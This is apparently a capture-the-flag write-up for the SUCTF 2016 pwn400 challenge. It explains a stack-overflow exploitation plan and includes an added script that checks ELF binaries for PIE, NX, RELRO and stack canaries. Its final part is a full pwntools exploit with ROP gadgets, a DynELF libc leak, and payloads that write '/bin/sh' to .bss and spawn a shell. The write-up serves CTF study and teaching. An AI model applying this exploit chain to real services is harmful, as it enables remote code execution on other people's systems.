SUCTF-2016-pwn400-writeup

Opening the binary in IDA, the program flow is simple and there is an obvious stack overflow.

No libc is provided and there are no protections such as a stack canary. The basic approach is as follows:

  • Build a ROP chain
  • Leak the address of system
  • Write /bin/sh into the .bss segment
  • Call system
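The plan above leans on properties a defender can verify on any binary before it ships: a non-PIE image (so gadget and PLT addresses are fixed), no stack protector (so the overflow reaches the saved return address), and whatever the GNU_STACK and RELRO program headers say. The script below is an added example, not part of the original writeup or of the SUCTF challenge; it reads an ELF64 header and its program headers with the standard library alone and reports PIE, NX, RELRO and a stack-protector heuristic, in the spirit of `checksec`. The `build_demo_elf` helper fabricates a minimal in-memory ELF image purely as constructed sample input (it is not loadable), so nothing on disk is required.

```python
import struct

# ELF constants (from the ELF specification / glibc elf.h)
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK = 0x6474e551
PT_GNU_RELRO = 0x6474e552
PF_X = 0x1


def elf_protections(data):
    """Return a dict describing which mitigations an ELF64 image declares.

    Only the ELF header and program headers are parsed; the canary check is a
    string heuristic (a -fstack-protector build imports __stack_chk_fail).
    Partial vs. full RELRO is not distinguished (that needs DT_BIND_NOW).
    """
    if data[:4] != b'\x7fELF':
        raise ValueError("not an ELF file")
    if data[4] != 2:
        raise ValueError("only ELF64 is handled here")
    # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
    # e_ehsize, e_phentsize, e_phnum (fields following the 16-byte e_ident)
    (e_type, _machine, _ver, _entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum) = struct.unpack_from('<HHIQQQIHHH', data, 16)

    stack_seen = False
    nx = False          # without PT_GNU_STACK the loader assumes an executable stack
    relro = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, p_flags = struct.unpack_from('<II', data, off)
        if p_type == PT_GNU_STACK:
            stack_seen = True
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {
        'pie': e_type == ET_DYN,
        'nx': stack_seen and nx,
        'relro': relro,
        'canary': b'__stack_chk_fail' in data,
    }


def build_demo_elf(e_type, stack_flags, with_relro, with_canary):
    """Construct a minimal ELF64 image (constructed test data, not runnable)."""
    phdrs = [(PT_GNU_STACK, stack_flags)]
    if with_relro:
        phdrs.append((PT_GNU_RELRO, 0x4))
    ehsize, phentsize = 64, 56
    # e_ident: magic, ELFCLASS64, little-endian, EV_CURRENT, padding
    image = b'\x7fELF' + bytes([2, 1, 1, 0]) + b'\x00' * 8
    image += struct.pack('<HHIQQQIHHHHHH',
                         e_type, 62, 1, 0x400000, ehsize, 0, 0,
                         ehsize, phentsize, len(phdrs), 64, 0, 0)
    for p_type, p_flags in phdrs:
        # p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align
        image += struct.pack('<IIQQQQQQ', p_type, p_flags, 0, 0, 0, 0, 0, 16)
    if with_canary:
        image += b'\x00__stack_chk_fail\x00'   # shape of the .dynstr entry
    return image


def report(data):
    """Render the protection dict as checksec-style lines."""
    prot = elf_protections(data)
    return '\n'.join("{:<8}{}".format(name + ':', 'yes' if on else 'NO')
                     for name, on in prot.items())


if __name__ == '__main__':
    # Profile matching the writeup: fixed-address executable, no canary, no RELRO
    weak = build_demo_elf(ET_EXEC, 0x6, with_relro=False, with_canary=False)
    hardened = build_demo_elf(ET_DYN, 0x6, with_relro=True, with_canary=True)
    print("weak build:\n" + report(weak))
    print("\nhardened build:\n" + report(hardened))
```

On a real file, `elf_protections(open(path, 'rb').read())` gives the same dict; a `pie: NO` together with `canary: NO` is exactly the combination the writeup exploits, and the fix is a build-flag change (`-fstack-protector-strong -pie -Wl,-z,relro,-z,now`) rather than anything in the program logic.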

The final exploit is as follows:

from pwn import *

p = process("./simple")
elf = ELF("./simple")

offset = 40                                # distance from the buffer to the saved return address
pop_rdi_ret_addr = 0x00000000004006c3      # gadget: pop rdi ; ret
pop_rsi_pop_r15_ret = 0x00000000004006c1   # gadget: pop rsi ; pop r15 ; ret
start_addr = elf.symbols['_start']
write_plt = elf.plt['write']
read_plt = elf.plt['read']
main_addr = elf.symbols['main']
bss_addr = elf.bss() + 0x18                # writable scratch area for the "/bin/sh" string


def leak(address):
    # Leak callback used by DynELF: call write(1, address, <rdx>) through the PLT,
    # then return into main so the overflow can be triggered again.
    log.info("leak address => {}".format(hex(address)))
    p.recvuntil(b'luck!\n')
    payload = b'a' * offset
    payload += p64(pop_rdi_ret_addr)
    payload += p64(1)                      # rdi = 1 (stdout)
    payload += p64(pop_rsi_pop_r15_ret)
    payload += p64(address)                # rsi = address to dump
    payload += p64(1)                      # r15 = filler
    payload += p64(write_plt)              # rdx (count) is whatever the program left in it
    payload += p64(main_addr)
    p.sendline(payload)
    data = p.recv(8)
    return data


# Resolve system() by walking the dynamic linker structures through the leak
d = DynELF(leak, elf=elf)
system_addr = d.lookup('system', 'libc')
log.success("system address => {}".format(hex(system_addr)))

# Return to _start for a clean stack before the final chain
payload = b'a' * offset
payload += p64(start_addr)
p.sendline(payload)
p.recvuntil(b'luck!\n')

# read(0, bss_addr, <rdx>) to place "/bin/sh" in .bss, then back to main
payload = b'a' * offset
payload += p64(pop_rdi_ret_addr)
payload += p64(0)                          # rdi = 0 (stdin)
payload += p64(pop_rsi_pop_r15_ret)
payload += p64(bss_addr)                   # rsi = destination in .bss
payload += p64(1)                          # r15 = filler
payload += p64(read_plt)
payload += p64(main_addr)
p.sendline(payload)
payload = b'/bin/sh\x00'
p.send(payload)
p.recvuntil(b'luck!\n')

# system("/bin/sh")
payload = b'a' * offset
payload += p64(pop_rdi_ret_addr)
payload += p64(bss_addr)                   # rdi = pointer to "/bin/sh"
payload += p64(system_addr)
p.sendline(payload)
p.interactive()


Title: SUCTF-2016-pwn400-writeup

Author: chybeta

Published: 2017-06-28 14:06

Last updated: 2017-07-28 15:07

Original link: http://chybeta.github.io/2017/06/28/SUCTF-2016-pwn400-writeup/

License: Attribution-NonCommercial-NoDerivatives 4.0 International. Please keep the original link and author when reposting.